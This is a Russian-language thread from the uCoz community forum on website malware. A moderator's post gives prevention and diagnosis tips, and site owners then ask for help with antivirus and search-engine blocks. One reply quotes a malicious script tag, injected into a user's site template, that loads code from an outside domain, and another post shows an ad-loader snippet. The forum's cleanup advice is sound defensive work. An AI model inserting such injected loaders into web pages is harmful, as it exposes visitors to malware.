Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    cs-game-club
    Сообщений: 58
    Репутация: 0

    Сообщение # 1051 | 16:43:32 10 Фев 2014
    Цитата amolochan ()
    Пожалуй сначала дождусь очередной проверки.

    Вы особо не экспериментируйте там, удаляйте то, что вам говорят, я могу ошибатся, но по моему, интервалы между проверками, каждый раз увеличиваются.
    amolochan
    Сообщений: 8
    Репутация: 0

    Сообщение # 1052 | 18:28:24 10 Фев 2014
    Цитата cs-game-club ()
    Вы особо не экспериментируйте там, удаляйте то, что вам говорят, я могу ошибатся, но по моему, интервалы между проверками, каждый раз увеличиваются.

    Проще всего все снять так и не выяснив точно причину, но ведь не факт вообще что в Адвмейкере дело! Их поддержка уверяет:"Обращений с жалобами не было. Все рекламные материалы проверяются и не могут привести к блоку.
    Запросите у Яндекса более подробное описание причины блока."

    Причин не доверять им у меня нет, так как на остальных сайтах действительно проблем нет
    Dexa
    Сообщений: 16
    Репутация: 0

    Сообщение # 1053 | 20:07:40 11 Фев 2014
    Здравствуйте,создал тему на форуме avast ,там мне написали что у меня есть подозрительные файл.
    Вот ссылки где проверяли мой сайт:
    http://sitecheck.sucuri.net/scanner....p.ru%2F
    http://www.quttera.com/detailed_report/Cheat-help.ru
    Вот моя тема на авасте:http://forum.avast.com/index.php?topic=145921.0
    Подскажите пожалуйста что мне им ответить ?
    Мой сайт: Cheat-help.ru
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1054 | 20:17:04 11 Фев 2014
    Dexa, конечно странно видеть, что хелперы аваста ссылаются на онлайн сервисы и по этим мотивам намекают на рекламу, хотя первая причина была - зараженный файл, залитый на сервер

    дайте мне скрин блокировки аваста в полный рост, чтобы можно было видеть описание блокировки
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Dexa
    Сообщений: 16
    Репутация: 0

    Сообщение # 1055 | 20:44:02 11 Фев 2014
    Цитата webanet ()
    xa, конечно странно видеть, что хелперы аваста ссылаются на онлайн сервисы и по этим мотивам намекают на рекламу, хотя первая причина была - зараженный файл, залитый на сервер дайте мне скрин блокировки аваста в полный рост, чтобы можно было видеть описание блокировки
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1056 | 20:47:00 11 Фев 2014
    Dexa, так там урл заблокирован. пишите в тех.поддержку аваста
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Dexa
    Сообщений: 16
    Репутация: 0

    Сообщение # 1057 | 20:49:17 11 Фев 2014
    Я даже там тему создал:http://forum.avast.com/index.php?topic=145921.0
    И в техническую поддержку писал , игнорят.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1058 | 20:53:08 11 Фев 2014
    Dexa, в любом случае блок с урла могут снять только там
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Dexa
    Сообщений: 16
    Репутация: 0

    Сообщение # 1059 | 22:17:08 11 Фев 2014
    Цитата webanet ()
    Dexa, в любом случае блок с урла могут снять только там
    Вот что написали "Pavrl, причина блокировки - сайт заражен.
    http://sitecheck2.sucuri.net/results/cheat-help.ru"
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1060 | 22:26:10 11 Фев 2014
    Dexa, вы пишите в тех.поддержку аваста и ждите там ответа. не надо тут кидать ссылки на гсервисы. или аваст ставит блок на основании вердикта стороннего онлайн сервиса? спросите это у тех, кто вам подсовывает эти ссылки
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Dexa
    Сообщений: 16
    Репутация: 0

    Сообщение # 1061 | 00:50:41 12 Фев 2014
    Это же реклама ucoza ?
    Код
    <script type="text/javascript">new Image().src = "http://counter.yadro.ru/hit;counter2?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script></div><script type="text/javascript">
    var m_up = [
        ['s',"94367"],
    ];
    document.write('<scr'+'ipt type="text/javascript" src="http://cache.betweendigital.com/code/mobile.js"></scr'+'ipt>');
    </script>
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1062 | 00:56:02 12 Фев 2014
    Dexa, нет. это счетчик ливы и какой-то добитый код под ним. в системе есть лива счетчик. и у вас есть лива счетчик
    судя по коду системный
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Alekso
    Сообщений: 12
    Репутация: 2

    Сообщение # 1063 | 09:46:25 12 Фев 2014
    Я начинающий. Мне на военно-морской сайт повесили порно банеры. Как их удалить не знаю. Пробовал восстановить старые шаблоны, ничего не помогло, банеры появились тут же. В данный момент сайт заблокировал (Технические работы) http://drozd-cruiser.ucoz.ru/ . Что делать? Сайт аналог этого, только по другим проектам кораблей: http://kara-1134b.ucoz.ru/ Тоже мой. Каждый день удаляю и блокирую левых посетителей, которые регестрируются, что бы писать спам. Чей это косяк? Пароль от админки врядли утерян. Или восстановление старых шаблонов не удаляет банеры?
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1064 | 10:41:40 12 Фев 2014
    Alekso, удалите вредоносный код используя, быструю замену участков шаблона. Также вам необходимо сменить пароль uID-аккаунта

    Код прописан в нижней части вашего шаблона
    Код
    <script language='javascript' charset='UTF-8' type='text/javascript' src='http://tsingera.ru/5easame6c5z7eb11wv3tp0164r61v4ut'></script>
    ВОА
    Сообщений: 7
    Репутация: 0

    Сообщение # 1065 | 11:18:33 12 Фев 2014
    Здравствуйте
    2 дня назад сайт был проверен яндекс-вебастеро, а сегодня опять
    Хотя вебмастер-яндекса сейчас ни какого кода не видит
    Сайт voanara.ucoz.ru
    может угрожать безопасности вашего компьютера.
    Страница сайта voanara.ucoz.ru пытается загрузить данные с заражённого сайта kinodrug.net. По нашим данным, на kinodrug.net был размещён вредоносный программный код. Это могло произойти как по желанию владельцев сайта, так и без их ведома — в результате действий злоумышленников.Более подробную информацию об угрозе или безопасную копию сайта можно посмотреть на странице с полными данными о заражении
    ЧТо делать, очень нужен чистый сайт((((((((((((((((((((((((((((((((((((((((
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: